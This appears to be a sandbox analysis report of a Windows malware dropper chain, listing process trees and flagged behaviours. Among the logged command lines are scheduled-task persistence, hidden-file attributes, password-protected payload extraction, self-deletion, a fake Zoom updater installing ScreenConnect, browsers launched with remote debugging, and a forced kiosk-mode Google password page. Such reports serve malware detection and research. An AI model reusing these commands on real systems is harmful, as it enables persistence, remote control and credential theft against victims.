PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 2452 wrote to memory of 1956	2452	skotes.exe	105
PID 2452 wrote to memory of 1956	2452	skotes.exe	105
PID 2452 wrote to memory of 1796	2452	skotes.exe	106
PID 2452 wrote to memory of 1796	2452	skotes.exe	106
PID 2452 wrote to memory of 1796	2452	skotes.exe	106
PID 1956 wrote to memory of 4648	1956	software1.exe	107
PID 1956 wrote to memory of 4648	1956	software1.exe	107
PID 1796 wrote to memory of 1460	1796	ZoomUpdateInstallerFull.exe	109
PID 1796 wrote to memory of 1460	1796	ZoomUpdateInstallerFull.exe	109
PID 1796 wrote to memory of 1460	1796	ZoomUpdateInstallerFull.exe	109
PID 2984 wrote to memory of 4224	2984	msiexec.exe	114
PID 2984 wrote to memory of 4224	2984	msiexec.exe	114
PID 2984 wrote to memory of 4224	2984	msiexec.exe	114
PID 4224 wrote to memory of 4092	4224	MsiExec.exe	115
PID 4224 wrote to memory of 4092	4224	MsiExec.exe	115
PID 4224 wrote to memory of 4092	4224	MsiExec.exe	115
PID 2452 wrote to memory of 4328	2452	skotes.exe	121
PID 2452 wrote to memory of 4328	2452	skotes.exe	121
PID 2452 wrote to memory of 4328	2452	skotes.exe	121
PID 2452 wrote to memory of 2516	2452	skotes.exe	126
PID 2452 wrote to memory of 2516	2452	skotes.exe	126
PID 2452 wrote to memory of 2516	2452	skotes.exe	126
PID 2452 wrote to memory of 2512	2452	skotes.exe	129
PID 2452 wrote to memory of 2512	2452	skotes.exe	129
PID 2452 wrote to memory of 2512	2452	skotes.exe	129
PID 2984 wrote to memory of 3968	2984	msiexec.exe	130
PID 2984 wrote to memory of 3968	2984	msiexec.exe	130
PID 2516 wrote to memory of 184	2516	a309bea949.exe	132
PID 2516 wrote to memory of 184	2516	a309bea949.exe	132
PID 184 wrote to memory of 3140	184	cmd.exe	134
PID 184 wrote to memory of 3140	184	cmd.exe	134
PID 2984 wrote to memory of 824	2984	msiexec.exe	135
PID 2984 wrote to memory of 824	2984	msiexec.exe	135
PID 2984 wrote to memory of 824	2984	msiexec.exe	135
PID 184 wrote to memory of 1776	184	cmd.exe	136
PID 184 wrote to memory of 1776	184	cmd.exe	136
PID 184 wrote to memory of 4464	184	cmd.exe	137
PID 184 wrote to memory of 4464	184	cmd.exe	137
PID 2984 wrote to memory of 3168	2984	msiexec.exe	138
PID 2984 wrote to memory of 3168	2984	msiexec.exe	138

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

Hidden Files and Directories

T1564.001

pid	Process
3896	attrib.exe
3984	attrib.exe
1448	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2552
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6948

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5036
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Users\Admin\AppData\Local\Temp\1016214001\4ipQYBO.exe
    "C:\Users\Admin\AppData\Local\Temp\1016214001\4ipQYBO.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4756
- - C:\Users\Admin\AppData\Local\Temp\1016223001\bEp1dJF.exe
    "C:\Users\Admin\AppData\Local\Temp\1016223001\bEp1dJF.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3168
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1028
      4⤵
      Program crash
      PID:3236
- - C:\Users\Admin\AppData\Local\Temp\1016235001\software1.exe
    "C:\Users\Admin\AppData\Local\Temp\1016235001\software1.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X91lnt" /tr "C:\Users\Admin\AppData\Roaming\X91lnt.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4648
- - C:\Users\Admin\AppData\Local\Temp\1016247001\ZoomUpdateInstallerFull.exe
    "C:\Users\Admin\AppData\Local\Temp\1016247001\ZoomUpdateInstallerFull.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1796
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\9e47e837d725d609\ScreenConnect.ClientSetup.msi"
      4⤵
      Enumerates connected drives
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1460
- - C:\Users\Admin\AppData\Local\Temp\1016268001\e4a30b7394.exe
    "C:\Users\Admin\AppData\Local\Temp\1016268001\e4a30b7394.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4328
- - C:\Users\Admin\AppData\Local\Temp\1016269001\a309bea949.exe
    "C:\Users\Admin\AppData\Local\Temp\1016269001\a309bea949.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:184
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:3140
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1776
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4464
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4988
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3896
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3040
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3516
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1532
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1988
    - - C:\Windows\system32\attrib.exe
        
        attrib +H "in.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1448
    - - C:\Users\Admin\AppData\Local\Temp\main\in.exe
        
        "in.exe"
        5⤵
        Executes dropped EXE
        
        PID:4836
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:3984
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:3896
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5016
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del in.exe
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1988
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5244
- - C:\Users\Admin\AppData\Local\Temp\1016270001\2b3f2f85be.exe
    "C:\Users\Admin\AppData\Local\Temp\1016270001\2b3f2f85be.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2512
  - - C:\Users\Admin\AppData\Local\Temp\CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
      "C:\Users\Admin\AppData\Local\Temp\CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe"
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Windows security modification
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5776
  - - C:\Users\Admin\AppData\Local\Temp\3QU4MGFSIPB37EB0HOOT5.exe
      "C:\Users\Admin\AppData\Local\Temp\3QU4MGFSIPB37EB0HOOT5.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:6964
- - C:\Users\Admin\AppData\Local\Temp\1016271001\ee69ff11d6.exe
    "C:\Users\Admin\AppData\Local\Temp\1016271001\ee69ff11d6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5740
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:6044
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff975c1cc40,0x7ff975c1cc4c,0x7ff975c1cc58
        5⤵
        
        PID:6064
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1860,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1852 /prefetch:2
        5⤵
        
        PID:4464
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3
        5⤵
        
        PID:5208
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2396 /prefetch:8
        5⤵
        
        PID:5216
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5272
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4880
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4212,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3588
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4820,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8
        5⤵
        
        PID:6032
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,9877659407531441478,104132332473445382,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4880 /prefetch:8
        5⤵
        
        PID:5380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:5308
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff972d746f8,0x7ff972d74708,0x7ff972d74718
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2460
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
        5⤵
        
        PID:1696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
        5⤵
        
        PID:6380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
        5⤵
        
        PID:6484
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6716
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
        5⤵
        
        PID:1044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
        5⤵
        
        PID:7012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2464 /prefetch:2
        5⤵
        
        PID:6952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2160 /prefetch:2
        5⤵
        
        PID:7912
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2100 /prefetch:2
        5⤵
        
        PID:9192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,14105507916283416817,14469751821246039464,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4768 /prefetch:2
        5⤵
        
        PID:10112
- - C:\Users\Admin\AppData\Local\Temp\1016272001\7165bda865.exe
    "C:\Users\Admin\AppData\Local\Temp\1016272001\7165bda865.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2032
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5124
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5992
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5520
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5728
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5140
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5136
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5168
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
